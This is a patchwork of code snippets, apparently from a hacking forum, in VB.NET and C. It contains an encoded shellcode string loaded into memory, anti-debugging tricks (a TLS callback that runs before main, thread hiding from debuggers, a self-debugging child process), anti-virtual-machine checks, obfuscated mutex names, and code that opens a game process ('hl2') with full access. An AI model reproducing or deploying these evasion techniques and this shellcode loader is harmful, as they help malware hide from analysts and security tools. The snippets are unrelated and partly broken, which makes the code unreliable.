Dim shellcode As String = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylJHk9s0C0s0SPmYxeTqzrqtnkaBDpNkV2VlNkpRb4nkqbQ8dOx7rjfFtqyoVQo0nLgLqq1lfbVL10IQ8O6mWqiWZBl0BrSgNkaBDPNkbbwLUQJplKQPpxOukpbTRjWqXPV0nkg828Nkshq0c1N3zCUlQYnk5dlKS1N6eaKOfQYPNLjaxOdMS1kwUhKPQeydtCQmIh7KsM7TBUIrV8LKPX6DgqICpfNkVlrkLKrxWls1zsLK5TNkuQN0Oyg4GTvD3kQKSQqIcjPQkO9pChcobzLKVrJKMVsmBJfaLMMUx9GpEPC0v0E8vQlKBOMWYoyEMkM0wmtjDJCXoVoeoMomyojuEl4FalDJk09kkPQe35mkw7fsd2PoBJ30sciohUbCSQbLbCfNauD8SUs0AA"
        Dim shell_array(shellcode.Length - 1) As Byte
        Dim i As Integer = 0
        Do
            shell_array(i) = Convert.ToByte(shellcode(i))
            i = i + 1
 
        Loop While i < shellcode.Length

VOID ThreadMain(LPVOID p)
{
    while (1)
    {
        if (IsDebuggerPresent())
        {
            __asm { int 3; }
        }
        Sleep(500);
    }
    return 0;
}

 __asm { int 3; }

Private Declare Function IsDebuggerPresent Lib "kernel32" () As Integer
 
Private Function IsDebuggerPresentFunc() As Boolean
        If IsDebuggerPresent = 1 Then
            Return True
        End If
        Return False
    End Function

 

Link (Actualizado) : AntiVM Class

 Public ProtectVM As AntiVM = New AntiVM
 
    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
        ProtectVM.VM_Start()
        Anti_VM_Timer.Enabled = True
    End Sub
 
    Private Sub Anti_VM_Timer_Tick(sender As Object, e As EventArgs) Handles Anti_VM_Timer.Tick
        Dim Detection As Boolean = ProtectVM.IsVirtualMachinePresent
        Dim Description As String = ProtectVM.DescriptcionVM
 
        If Detection = True Then
           msgbox("VM detectada : " & Description)
        End If
 
    End Sub
 

 <DllImport("msvcrt.dll", EntryPoint:="memcpy", CallingConvention:=CallingConvention.Cdecl)> _
    Public Shared Sub CopyMemory(ByVal dest As IntPtr, ByVal src As IntPtr, ByVal count As Integer)
    End Sub
 
 
 
    Private Function GetMutexString() As String
 
        Dim lpMutexStr As String = calloc(64, 1)
        Dim s() As Byte = {&H98, &H9B, &H99, &H9D, &HC3, &H15, &H6F, &H6F, &H2D, &HD3, &HEA, &HAE, &H13, &HFF, &H7A, &HBE, &H63, &H36, &HFC, &H63, &HF3, &H74, &H32, &H74, &H71, &H72, &H4E, &H2, &H81, &H1E, &H19, &H20, &H44, &HDF, &H81, &HD7, &H15, &H92, &H93, &H1A, &HE7}
        Dim Sizes As Integer = Marshal.SizeOf(s(0)) * s.Length
        Dim pnt1 As IntPtr = Marshal.AllocHGlobal(Sizes)
        Dim m As UInteger = 0
        Do While m < Len(s)
            Dim c As Byte = s(m)
            c -= &HE8
            c = ((c >> &H5) Or (c << &H3))
            c = -c
            c += &H51
            c = Not c
            c -= &H93
            c = ((c >> &H3) Or (c << &H5))
            c += &H14
            c = c Xor &H14
            c = ((c >> &H1) Or (c << &H7))
            c = c Xor &HD3
            c += m
            c = Not c
            c = ((c >> &H5) Or (c << &H3))
            c -= &H2B
            s(m) = c
            m += 1
        Loop
 
        CopyMemory(lpMutexStr, pnt1, Len(s))
        Return lpMutexStr
    End Function

#include <stdio.h>
#include <windows.h>
#include <tchar.h>
#include <psapi.h>
 
typedef enum { ThreadHideFromDebugger = 0x11 } THREADINFOCLASS;
 
typedef NTSTATUS(WINAPI *NtQueryInformationThread_t)(HANDLE, THREADINFOCLASS, PVOID, ULONG, PULONG);
typedef NTSTATUS(WINAPI *NtSetInformationThread_t)(HANDLE, THREADINFOCLASS, PVOID, ULONG);
 
VOID ThreadMain(LPVOID p);
LPSTR GetMutexString();
 
VOID WINAPI init_antidbg(PVOID DllHandle, DWORD Reason, PVOID Reserved)
{
    //Deobfuscate our mutex and lock it so our child doesnt execute this TLS callback.
    unsigned char s[] =
    {
 
        0x9d, 0x3, 0x3c, 0xec, 0xf0, 0x8b, 0xb5, 0x5,
        0xe2, 0x2a, 0x87, 0x5, 0x64, 0xe4, 0xf8, 0xe7,
        0x64, 0x29, 0xd2, 0x6, 0xad, 0x29, 0x9a, 0xe0,
        0xea, 0xf9, 0x2, 0x7d, 0x31, 0x72, 0xf7, 0x33,
        0x13, 0x83, 0xb, 0x8f, 0xae, 0x2c, 0xa7, 0x2a,
        0x95
    };
 
    for (unsigned int m = 0; m < sizeof(s); ++m)
    {
        unsigned char c = s[m];
        c = (c >> 0x7) | (c << 0x1);
        c ^= m;
        c = (c >> 0x5) | (c << 0x3);
        c += 0xa9;
        c = ~c;
        c += 0xd6;
        c = -c;
        c += m;
        c = ~c;
        c = (c >> 0x5) | (c << 0x3);
        c -= m;
        c = ~c;
        c += m;
        c ^= m;
        c += m;
        s[m] = c;
    }
 
    HANDLE hMutex = CreateMutexA(NULL, TRUE, s);
 
    // We don't want to empty the working set of our child process, it's not neccessary as it has a debugger attached already.
    if (GetLastError() == ERROR_ALREADY_EXISTS)
    {
        return;
    }
 
    /*
        CODE DESCRIPTION:
        The following code is reponsible for preventing the debugger to attach on parent process at runtime.
    */
    SIZE_T min, max;
    SYSTEM_INFO si = { 0 };
 
    GetSystemInfo(&amp;si);
 
    K32EmptyWorkingSet(GetCurrentProcess());
 
    void *p = NULL;
    while (p = VirtualAllocEx(GetCurrentProcess(), NULL, si.dwPageSize, MEM_COMMIT | MEM_RESERVE, PAGE_NOACCESS))
    {
        if (p == NULL)
            break;
    }
    /*
        DESCRIPTION END
    */
 
 
    /*
        CODE DESCRIPTION:
        The following code is responsible for handling the application launch inside a debbuger and invoking a crash.
    */
    NtQueryInformationThread_t fnNtQueryInformationThread = NULL;
    NtSetInformationThread_t fnNtSetInformationThread = NULL;
 
    DWORD dwThreadId = 0;
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ThreadMain, NULL, 0, 0, &amp;dwThreadId);
 
    HMODULE hDLL = LoadLibrary("ntdll.dll");
    if (!hDLL) return -1;
 
    fnNtQueryInformationThread = (NtQueryInformationThread_t)GetProcAddress(hDLL, "NtQueryInformationThread");
    fnNtSetInformationThread = (NtSetInformationThread_t)GetProcAddress(hDLL, "NtSetInformationThread");
 
    if (!fnNtQueryInformationThread || !fnNtSetInformationThread)
        return -1;
 
    ULONG lHideThread = 1, lRet = 0;
 
    fnNtSetInformationThread(hThread, ThreadHideFromDebugger, &amp;lHideThread, sizeof(lHideThread));
    fnNtQueryInformationThread(hThread, ThreadHideFromDebugger, &amp;lHideThread, sizeof(lHideThread), &amp;lRet);
    /*
        DESCRIPTION END
    */
}
 
 
// Usually what happens is that person who does the analysis doesn't have a breakpoint set for TLS.
// (It's not set ON by default in x64dbg)
#pragma comment(linker, "/INCLUDE:__tls_used") // We want to include TLS Data Directory structure in our program
#pragma data_seg(push)
#pragma data_seg(".CRT$XLAA")
EXTERN_C PIMAGE_TLS_CALLBACK p_tls_callback1 = init_antidbg; // This will execute before entry point and main function.
#pragma data_seg(pop)
 
 
int main(int argc, char *argv[])
{
    // Beging by deobfuscating our mutex.
    HANDLE hMutex = CreateMutexA(NULL, TRUE, GetMutexString());
 
    if (GetLastError() == ERROR_ALREADY_EXISTS) {
        // We are a spawn, run normally
        printf("[+] Normal execution.\n");
        getchar();
        return 0;
    }
    else {
        // We are the first instance
        TCHAR szFilePath[MAX_PATH] = { 0 };
        GetModuleFileName(NULL, szFilePath, MAX_PATH);
 
        PROCESS_INFORMATION pi = { 0 };
        STARTUPINFO si = { 0 };
        si.cb = sizeof(STARTUPINFO);
 
        // Create child process
        CreateProcess(szFilePath, NULL, NULL, NULL, FALSE, DEBUG_PROCESS | DEBUG_ONLY_THIS_PROCESS | CREATE_NEW_CONSOLE, 0, NULL, &amp;si, &amp;pi);
        if (pi.hProcess != NULL) {
            printf("[+] Spawning child process and attaching as a debugger.\n");
 
            // Debug event
            DEBUG_EVENT de = { 0 };
            while (1)
            {
                WaitForDebugEvent(&amp;de, INFINITE);
                // We only care about when the process terminates
                if (de.dwDebugEventCode == EXIT_PROCESS_DEBUG_EVENT)
                    break;
                // Otherwise ignore all other events
                ContinueDebugEvent(pi.dwProcessId, pi.dwThreadId, DBG_CONTINUE);
            }
        }
 
        CloseHandle(pi.hProcess);
        CloseHandle(hMutex);
    }
 
    return 0;
}
 
LPSTR GetMutexString()
{
    LPSTR lpMutexStr = calloc(64, 1);
    unsigned char s[] =
    {
 
        0x98, 0x9b, 0x99, 0x9d, 0xc3, 0x15, 0x6f, 0x6f,
        0x2d, 0xd3, 0xea, 0xae, 0x13, 0xff, 0x7a, 0xbe,
        0x63, 0x36, 0xfc, 0x63, 0xf3, 0x74, 0x32, 0x74,
        0x71, 0x72, 0x4e, 0x2, 0x81, 0x1e, 0x19, 0x20,
        0x44, 0xdf, 0x81, 0xd7, 0x15, 0x92, 0x93, 0x1a,
        0xe7
    };
 
    for (unsigned int m = 0; m < sizeof(s); ++m)
    {
        unsigned char c = s[m];
        c -= 0xe8;
        c = (c >> 0x5) | (c << 0x3);
        c = -c;
        c += 0x51;
        c = ~c;
        c -= 0x93;
        c = (c >> 0x3) | (c << 0x5);
        c += 0x14;
        c ^= 0x14;
        c = (c >> 0x1) | (c << 0x7);
        c ^= 0xd3;
        c += m;
        c = ~c;
        c = (c >> 0x5) | (c << 0x3);
        c -= 0x2b;
        s[m] = c;
    }
    memcpy(lpMutexStr, s, sizeof(s));
    return lpMutexStr;
}
 
VOID ThreadMain(LPVOID p)
{
    while (1)
    {
        if (IsDebuggerPresent())
        {
            __asm { int 3; }
        }
        Sleep(500);
    }
    return 0;
}
}

Imports System
 
Public Class ACCENTPOLICY
 
    Public nAccentState As Integer
 
    Public nFlags As Integer
 
    Public nColor As Integer
 
    Public nAnimationId As Integer
End Class
 
Public Class WINCOMPATTRDATA
 
    Public nAttribute As Integer
 
    Public pData As Object
 
    Public ulDataSize As UInteger
End Class
 
Public Class Funcs
 
    Public Delegate Function pSetWindowCompositionAttribute(ByVal UnnamedParameter As System.IntPtr, ByVal UnnamedParameter2 As WINCOMPATTRDATA) As Boolean
 
 
    Friend Declare Function SetWindowCompositionAttribute Lib "user32.dll" (ByVal UnnamedParameter As System.IntPtr, ByVal UnnamedParameter2 As WINCOMPATTRDATA) As Boolean
 
    Public Shared Sub SetWindowTransparent(ByVal hWnd As IntPtr)
        Dim hModule As IntPtr = New IntPtr
        If hModule Then
            Dim SetWindowCompositionAttribute As pSetWindowCompositionAttribute = SetWindowCompositionAttribute
            If (Not (SetWindowCompositionAttribute) Is Nothing) Then
                Dim policy As ACCENTPOLICY = New ACCENTPOLICY
                ' ACCENT_ENABLE_TRANSPARENTGRADIENT=2...
                Dim data As WINCOMPATTRDATA = New WINCOMPATTRDATA
                ' WCA_ACCENT_POLICY=19
                SetWindowCompositionAttribute(hWnd, data)
            End If
 
        End If
 
    End Sub
 
End Class
 
 

Imports WindowsApplication4.ACCENTPOLICY
 
Public Class Form1
 
 
    Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal Classname As String, ByVal WindowName As String) As IntPtr
    Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hWnd As IntPtr, ByRef lpdwProcessId As Integer) As Integer
    Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Integer, ByVal bInheritHandle As Integer, ByVal dwProcessId As Integer) As IntPtr
    Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As IntPtr) As Integer
    Public Const PROCESS_VM_ALL As Integer = &H1F0FFF
    Public hWnd As IntPtr, pHandle As IntPtr, processID As Integer
    Const ProcessName As String = "hl2"
 
 
    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
 
        If ProcessHack() = 1 Then
            WindowsApplication4.Funcs.SetWindowTransparent(pHandle)
        End If
 
    End Sub
 
    Private Function ProcessHack() As Integer
        Dim proc As Process() = Process.GetProcessesByName(ProcessName)
        Dim windowname As String
        windowname = proc(0).MainWindowTitle
        hWnd = FindWindow(vbNullString, windowname)
        GetWindowThreadProcessId(hWnd, processID)
        pHandle = OpenProcess(PROCESS_VM_ALL, 0, processID)
        If hWnd = 0 Then
            Return 0
        Else
            Return 1
        End If
    End Function
 
 
End Class